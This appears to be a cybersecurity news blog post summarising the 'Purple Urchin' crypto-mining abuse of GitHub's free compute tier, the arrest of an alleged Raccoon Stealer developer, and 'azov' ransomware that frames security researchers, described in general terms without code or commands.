A massive crypto mining operation has been discovered, which literally runs on Github. But, how does that work? Well, Github has a certain feature which cybercriminals love - Github feature allows developers to spin up a temporary virtual machine on Github’s servers, so they can automate tasks like code compilation and testing. But because this runs on a standard VM, it can be used to do almost anything, like mine crypto.
And the very second Github added 2,000 minutes per month of this compute power to their free tier, cyber criminals have been all over it like a moth to a lamp. However, there is a catch - whilst these VMs are fast enough for what they’re designed for. But They suck at crypto mining
 |
| Github free plan |
I mean, forget high performance GPUs, these things run on just 2 CPU cores so mining is incredibly slow which means miscreants have to, be creative. And in this latest campaign uncovered by researchers, this means that the group behind it – which the researchers are calling them “Purple Urchin”, for same reason, they created thousands of bot accounts, not just on Github, but on other platforms which offer a free tier of a similar service.
The “Purple Urchin” group creates accounts is really quite clever, they use a load of different VPNs so each account is created under a different IP, they also use a special tool to automate mouse and keyboard action when clicking through the account creation screen on Github’s website. At this point only the captcha is standing in their way - but many captcha’s (github’s included) have an option for visually impaired, this means listening to a bit of audio and typing out the numbers - “Purple Urchin” bypasses this with the help of a speech to text AI. And, after this hurdle, “Purple Urchin” has another bot, so they don’t have to lift a finger.
After creating Thousands of bots, “Purple Urchin” has an army to mining crypto. But, they were mining really low profit margin coins also known as “shitcoins”. So, its thought this whole operation could just be a test, a pre-cursor to a larger campaign where they might mine something like Monero - and, let’s assume that is the plan, just how much money would they make mining Monero on github?
This is where it starts to get kinda ridiculous, because for every 1 Monero the cyber criminals mine on these VMs, it would cost github over a 1,00,000 dollars. Simply because mining in a VM which is running on only a couple CPU cores is incredibly inefficient, but “Purple Urchin” aren’t footing the electricity bill here, so why would they care?
But an alternative theory is they’re targeting these small coins because it’s easier to attack their underlying blockchain. As in, when it comes to crypto if you control 51% of a network’s hashrate, then you can control the entire network, and validate arbitrary transactions, potentially stealing millions of dollars. This is much more doable on smaller, less relevant coins.
Ever since the researchers published their findings, Purple Urchin’s campaign, has evaporated. Nevertheless, crypto mining using cloud services remains a huge problem for platforms. And one such platform, Heroku, has announced that because, their “security teams are spending an extraordinary amount of effort to manage fraud and abuse of the their free product plans” - they “plan to stop offering free product plans” altogether. And whilst Github has made some changes to their service to combat cryptomining abuse, they’ve kept their free tier, and so the cryptomining continues.
The alleged operator behind the notorious malware “racoon stealer”, has been arrested after his cyber criminal friends seemingly faked his death. So, the Raccoon stealer spawned in 2019, latching on to the ‘malware as a service’ trend. As in, rather than use it themselves the developers rent it out to other cyber criminals on a subscription model.
The developers behind “raccoon stealer” don’t infect anyone with it themselves, instead they rent it out to other cyber criminals on a subscription model like a Netflix. For $200 per month, customers get a web interface where they can generate custom versions of “racoon stealer”, manage the computers they’ve infected, and most importantly retrieve stolen credentials. Because “raccoon stealer” is primarily an info stealer, after infecting a PC it’ll infiltrate saved passwords, credit cards, crypto wallets and so on - it can steal data from nearly 60 apps.
Unfortunately this malware is really noob friendly, as customers don’t have worry about operating their own servers or developing their own malware, they only have to deal with spreading the malware, whether that be with phishing emails, fake cracked software, or in one case someone went so far as to set up a fake ‘play to earn game’, ‘cthulhu world’, with the sole intent of spreading this malware.
So, Raccoon stealer had become incredibly popular among cyber miscreants, but it was crashed in March when they abruptly announced that they had to close their Raccoon stealer project”. Because “due to the special operation” - referring to the war in Ukraine, members of their team had been killed. They added that some of their servers have “already stopped responding”. But was all a lie, but for different reasons.
The guy they’re referring to who was killed in the war, is allegedly one “Mark Sokolovsky” - apparently one of Raccoon stealer’s key developers. But far from dying in the war, he fled the country by bribed Ukrainian border guards in order to leave the country (because of course there’s currently a ban on men leaving Ukraine), he was then snapped crossing the border from Poland into Germany in his Porsche.
 |
| Mark Sokolovsky |
He eventually arrived in Amsterdam, with is his girlfriend, who documented their little adventure on Instagram. He was arrested by Dutch police, and is now facing extradition to the US on charges which could land him in prison for 20 years. But, how did US authorities, the FBI figure out his real identity? Court documents don’t explain, but thanks to anonymous sources which tipped off by a popular cyber security blog. It seems, he made one tiny - but fatal mistake.
Early on in his cyber crime career - under one of his pseudonyms “Photix”, he made a post on a cyber crime forum which referenced a certain gmail account, the FBI discovered it was connected to an iCloud account, and at this point everything unravelled, the feds accessed it and found a bunch of incriminating evidence, including this picture - at which point they were probably just waiting for an opportunity to arrest him, which his trip to Amsterdam provided.
As for why his “raccoon stealer” team members faked his death – well they can’t admitting that one of their main guys has been arrested and one of theirs servers had been seized by the FBI would be very bad for business. Because shortly after they announced they were shutting down, they u-turned and said they were going offline to rework some code, and to “expect them back in a few months” and FBI found over 50 million stolen credentials on it, and they’ve launched a website where you can check if your email address is included in the data dump.
A strange new kind of ransomware has appeared, who’s main purpose is to frame security researchers. The victims have been finding their files encrypted with the ‘azov’ file extension, hidden within - is a ransom note. Perpetrated by some cyber criminal intent on extorting people out of a couple hundred dollars of Monero.
But, not quite - the note starts with “Hello, my name is Hasherezade”, a “Polish security expert”, and to “recover your files, contact us on Twitter”, listing a bunch of Twitter accounts belonging to prominent cyber security researchers, who have nothing to do with this ransomware.
This whole thing was specifically manufactured just to cause problems for these researchers, by some unknown person with a grudge against them for some reason. And people on this list have reported that “victims have already started contacting them for help recovering files”. The rest of the ransom note is about the war in Ukraine, claiming the purpose of this ransomware is “to bring your attention to the problem”. So, the mentioned people have nothing to do with victims. So, victims are pretty much out of luck.
And unfortunately it is quite easy for someone with way too much time on their hands to pull off an operation like this - as this malware isn’t being spread by some sophisticated method, there’s no phishing campaign, no vulnerabilities that are being taking advantage off. Instead the miscreant behind this has been taking the low effort approach of just buying installs on hacking forums. And, they’ve been paying botnet operators to execute this malware on a number their bots. And, this is a lot cheaper than you’d expect, with botnet owners typically charging just 10 cents per install. So, armed with just a couple hundred dollars, someone could potentially cause havoc on thousands of computers.
Read also Crypto Staking Advantages and Disadvantages
